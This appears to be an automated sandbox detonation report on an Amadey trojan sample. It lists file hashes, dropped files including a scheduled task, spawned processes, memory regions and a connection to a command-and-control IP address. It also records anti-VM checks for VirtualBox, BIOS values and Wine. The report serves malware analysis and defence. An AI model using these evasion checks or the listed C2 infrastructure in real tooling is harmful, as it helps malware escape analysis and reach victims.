SHA512 807109435fd6ae9152f0b699fbe30f6e219511de7b625a6a8eac63b9a5f59d098caed85eaec8aeeafd9160db4aaf4fd17e6a4606ea7e571d62ab00320a297dfa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 c1657c09cbf653085fe5977265c03e1d
SHA1 304d2bd99d40aa426d2620893045e7c8805f3906
SHA256 3e9b4e775c00a2fd2b1db9d5c7b4e83d6df7f3683aaba7283a8137248dad751a
SHA512 73cb77912b1482f76e4b5a091dac1f83401673f64973e458ab0a8184aba41f3c0560950c26941ea952a02cf2cde9722de726313a8820fd5daa07e06c97344f4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

MD5 a64c57cc2af06e31bdb3e3e1e9bc75ae
SHA1 020eedf9ce743d862584591385814e2030d930d3
SHA256 1806293e8318aa0b5580a41197f4877a915c9d1697e9af0dc4988e67bf500365
SHA512 524e5c2fbd8494ce07ecf568715fa2ff91edc193033f280a0831d16279a2561dd8c4d046ec877c81f652a97c1abd12107b92c013d398516c9c501d7d3f64f13d

C:\Windows\Installer\MSIE9BA.tmp

MD5 82d54afa53f6733d6529e4495700cdd8
SHA1 b3e578b9edde7aaaacca66169db4f251ee1f06b3
SHA256 8f4894b9d19bfe5d8e54b5e120cef6c69abea8958db066cdd4905cc78ecd58b6
SHA512 22476e0f001b6cf37d26e15dfb91c826c4197603ea6e1fbb9143c81392e41f18fa10a2d2d1e25425baaf754bff7fd179ef1df34966c10985e16d9da12a445150

C:\Windows\Installer\MSIEA09.tmp

MD5 d53b2b818b8c6a2b2bae3a39e988af10
SHA1 ee57ec919035cf8125ee0f72bd84a8dd9e879959
SHA256 2a81878be73b5c1d7d02c6afc8a82336d11e5f8749eaacf54576638d81ded6e2
SHA512 3aaf8b993c0e8f8a833ef22ed7b106218c0f573dcd513c3609ead4daf90d37b7892d901a6881e1121f1900be3c4bbe9c556a52c41d4a4a5ec25c85db7f084d5e

C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools-18.2.dist-info\zip-safe

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

MD5 a5b010d5b518932fd78fcfb0cb0c7aeb
SHA1 957fd0c136c9405aa984231a1ab1b59c9b1e904f
SHA256 5a137bfe1f0e6fc8a7b6957d5e9f10df997c485e0869586706b566015ff36763
SHA512 e0ca4b29f01f644ef64669ed5595965b853ae9eaa7c6c7d86df7634437041ef15ceb3c2d1ab9dec4171c80511684a7d7b06fc87b658e5a646699eb9523bc4994

C:\Config.Msi\e59e72b.rbs

MD5 9f72d982c0d6471e57ca44c295ea8b33
SHA1 2fb67ef35c005949d7cb9c6dc98ae961428bff70
SHA256 7f479884281ffd1ba4e380beed45f966902b6c4f36dd2c687f896526be629509
SHA512 bb9f72d7d3f6132240c2567f078c346a55719bb61e01baceb31ff1d333fdddbc2ad0d6d4e01ba85ed5becc7bba2b64a5106da882c5ede75a138516c00e386780

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 03:56

Reported

2024-07-31 03:59

Platform

win11-20240730-en

Max time kernel

142s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Network

Country Destination Domain Proto
RU 185.215.113.19:80 185.215.113.19 tcp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp

Files

memory/3836-0-0x00000000002E0000-0x00000000007A4000-memory.dmp

memory/3836-1-0x0000000077456000-0x0000000077458000-memory.dmp

memory/3836-2-0x00000000002E1000-0x000000000030F000-memory.dmp

memory/3836-3-0x00000000002E0000-0x00000000007A4000-memory.dmp

memory/3836-4-0x00000000002E0000-0x00000000007A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 f84c467d7176648368090a12c87f0161
SHA1 7126e1c0347b3300592ba1a1a81385d6240174f7
SHA256 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
SHA512 839aec9230a202cdce5a6c254b4792bf53ba4a087a160b743d4d7c69df95a369ef8384fc4558556eaa4cdab83c897110da0844ba02fa7f539890c078dc555dc9

memory/3836-17-0x00000000002E0000-0x00000000007A4000-memory.dmp

memory/3532-18-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-19-0x0000000000471000-0x000000000049F000-memory.dmp

memory/3532-20-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-21-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-22-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-23-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-24-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-25-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-26-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-27-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-28-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-30-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-31-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-32-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-34-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-35-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-36-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-37-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-38-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-39-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-40-0x0000000000470000-0x0000000000934000-memory.dmp

memory/4716-42-0x0000000000470000-0x0000000000934000-memory.dmp

memory/4716-43-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-44-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-45-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-46-0x0000000000470000-0x0000000000934000-memory.dmp